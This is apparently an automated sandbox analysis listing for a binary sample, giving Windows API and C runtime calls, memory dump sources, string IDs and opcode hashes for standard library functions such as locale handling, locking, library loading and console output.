                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • codecvt.LIBCPMT ref: 00197410
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00197427
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00197447
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00197454
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                            • String ID: (B"
                                                                                                                                                                                                                            • API String ID: 2133458128-3727729193
                                                                                                                                                                                                                            • Opcode ID: b83049d65d6de4685eeaff54798ac9ec26b39d63af27ba5e7d732eca5cd03d49
                                                                                                                                                                                                                            • Instruction ID: 84870491a8d04261862ea8d05ae0ccebbc61a891c73630b256a33adc09a09913
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b83049d65d6de4685eeaff54798ac9ec26b39d63af27ba5e7d732eca5cd03d49
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A01F531D24126EBCF05EBA8E8456BD7BB1AF90724F280549F8106B2D2CF749D42C781
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001992D3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 001992E1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001992F2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00199303
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-1247241052
                                                                                                                                                                                                                            • Opcode ID: dc038cd96ca53a9b0488484623bebb7ef3fecf63435a069f90062a6cac2134e2
                                                                                                                                                                                                                            • Instruction ID: d5a7187d1098fa8030c5b4dbb75a129db3945fdb74396fe5e4e6df1eb12df858
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc038cd96ca53a9b0488484623bebb7ef3fecf63435a069f90062a6cac2134e2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77E0EC71599211FBD7117FBAFC0DCD53AB4AB657123021361F825E26A0DBBC04818B60
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                                                                                                            • Opcode ID: 9640118504dca5fc609eca447f737326d7e929f34b3ad63adee416e02cbef6e9
                                                                                                                                                                                                                            • Instruction ID: 308ea2a21fbcea147457a620cf1935658d02ad4d49831edc4724b1705a785931
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9640118504dca5fc609eca447f737326d7e929f34b3ad63adee416e02cbef6e9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EB11378E08289AFDF15DF99D8C1BADBBB1BF6A314F144158E401AB297C7709D42CB60
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0019912C
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00199158
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00199197
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001991B4
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001991F3
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00199210
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00199252
                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00199275
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                                                                                            • Opcode ID: 15ed452b2f97c8035117caa678f8b3f0553a9704b12cbd5edbf1a9c3eceb8512
                                                                                                                                                                                                                            • Instruction ID: 7fd50b96def1b45317b9e7a953593e12522771d6718a0916f9754a99ebb74482
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ed452b2f97c8035117caa678f8b3f0553a9704b12cbd5edbf1a9c3eceb8512
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D551AE72A0020ABFEF209FA9CC45FAB7BA9EF55750F25452DF904AA150D734DD50CBA0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0019CF21
                                                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0019D02F
                                                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0019D19C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 1206542248-393685449
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019C907
                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0019C90F
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019C998
                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0019C9C3
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019CA18
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,BB40E64E,?,001A72FC,0019EE66,?,F8250000,00000000), ref: 001A72B0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194903
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194916
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194949
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0019495F
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0019496A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID: PB"
                                                                                                                                                                                                                            • API String ID: 2081738530-2228394945
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0019CA8B,0019AD89,001969F4,BB40E64E,?,?,?,?,001B52D0,000000FF), ref: 0019CAA2
                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0019CAB0
                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019CAC9
                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0019CA8B,0019AD89,001969F4,BB40E64E,?,?,?,?,001B52D0,000000FF), ref: 0019CB1B
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C15
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C27
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C49
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 001ACA5B
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 001ACB1C
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACB83
                                                                                                                                                                                                                              • Part of subcall function 001A7A23: HeapAlloc.KERNEL32(00000000,001ADBAE,?,?,001ADBAE,00000220,?,?,?), ref: 001A7A55
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACB98
                                                                                                                                                                                                                            • __freea.LIBCMT ref: 001ACBA8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32(00000034,?,00000002,?,001934CC,?,?), ref: 00198BBE
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000003,?,00000002,?,001934CC,?,?), ref: 00198BDD
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C0B
                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C66
                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C7D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 66001078-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194A3B
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194A4E
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194A81
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00194A97
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00194AA2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00194F7A
                                                                                                                                                                                                                            • int.LIBCPMT ref: 00194F8D
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00194FC0
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00194FD6
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00194FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                                                                            • Opcode ID: 255f4cf08b0ef4445cb2dc9c6efbf3015198c7f8bd19c81de7081857add5e75a
                                                                                                                                                                                                                            • Instruction ID: cbfc883058d0d25b3001417605d62af499087d9ff52e465c93edc064462768e9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 255f4cf08b0ef4445cb2dc9c6efbf3015198c7f8bd19c81de7081857add5e75a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85012632910115BBCF24AB98E805C9E7768EF91360B250109F911A7290EF30EE82C780
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 001987C9
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001987D4
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00198842
                                                                                                                                                                                                                              • Part of subcall function 00198925: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0019893D
                                                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 001987EF
                                                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 00198805
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1088826258-0
                                                                                                                                                                                                                            • Opcode ID: 76e932dd4a9403f47bad38c61605c66790351fe0338337ccc997128d320824d3
                                                                                                                                                                                                                            • Instruction ID: e20684718c6eb2a98c4f6aab032cd5c4ef854166e2c7556479232e3003a279d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e932dd4a9403f47bad38c61605c66790351fe0338337ccc997128d320824d3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12017C76A002619BCF06EB64E85597C7BB1FFE6750B180149F80157391CF386E46CB92
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0019DB48,?,?,00000000,?,?,?,0019DC72,00000002,FlsGetValue,001B7CF0,FlsGetValue), ref: 0019DBA4
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0019DB48,?,?,00000000,?,?,?,0019DC72,00000002,FlsGetValue,001B7CF0,FlsGetValue,?,?,0019CAB5), ref: 0019DBAE
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0019DBD6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                            • Opcode ID: c7784d33fccf299011b0589b17dddfaa6fa6ee260690a63a5e8af79589c02694
                                                                                                                                                                                                                            • Instruction ID: c133234c4cb124ee3bb6ca03609e76eb7768d5bdcd4e9e21aa3547099170dd64
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7784d33fccf299011b0589b17dddfaa6fa6ee260690a63a5e8af79589c02694
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E04F70284308B7EF202B62ED06F593F55AB11B50F150420F94EE98E1EB65E8949595
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(0022437C,00224EAC,?,0019563F,00224EAC,001B5740,00000000,00191C44), ref: 00199384
                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(0022437C,?,0019563F,00224EAC,001B5740,00000000,00191C44), ref: 001993B7
                                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32(00224378,?,0019563F,00224EAC,001B5740,00000000,00191C44), ref: 001993C2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                                                                                                                            • String ID: |C"
                                                                                                                                                                                                                            • API String ID: 1466638765-2896041220
                                                                                                                                                                                                                            • Opcode ID: 4bbd69df741be18a8bb3a96e09b33b264d92f6b828e376f0c71a00075ace9cc4
                                                                                                                                                                                                                            • Instruction ID: bb9c42844a680a37ec00da99dac736a05e5cee0a0b4b123795f4479544d7521b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bbd69df741be18a8bb3a96e09b33b264d92f6b828e376f0c71a00075ace9cc4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1F06D74541210EFC304FF99F888C957BB9EB0E751B04406AFE0983B20CB34A880CF50
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,016E13CA), ref: 001A9E13
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001AA06E
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001AA0B6
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001AA159
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                                                            • Opcode ID: f82a87537b8027e7676200c750c1b61b831474968f170b13568869e79486f1ab
                                                                                                                                                                                                                            • Instruction ID: 80c44f9e7b3c098a654754e3b3f3022cad9a2736861c239906b449d63f08c166
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f82a87537b8027e7676200c750c1b61b831474968f170b13568869e79486f1ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0D159B9E00258AFCF15CFA8D880AEEBBB5FF19304F58412AE856E7351D730A945CB51
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001AD11F
                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001AD126
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 001AD160
                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001AD167
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 001AE072
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AE0AA
                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AE0CA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,001B2877,00000000,00000001,00000000,016E13CA,?,001AA1AD,016E13CA,00000000,00000000), ref: 001B397D
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,001B2877,00000000,00000001,00000000,016E13CA,?,001AA1AD,016E13CA,00000000,00000000,016E13CA,016E13CA,?,001AA734,00000000), ref: 001B3989
                                                                                                                                                                                                                              • Part of subcall function 001B394F: CloseHandle.KERNEL32(FFFFFFFE,001B3999,?,001B2877,00000000,00000001,00000000,016E13CA,?,001AA1AD,016E13CA,00000000,00000000,016E13CA,016E13CA), ref: 001B395F
                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 001B3999
                                                                                                                                                                                                                              • Part of subcall function 001B3911: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B3940,001B2864,016E13CA,?,001AA1AD,016E13CA,00000000,00000000,016E13CA), ref: 001B3924
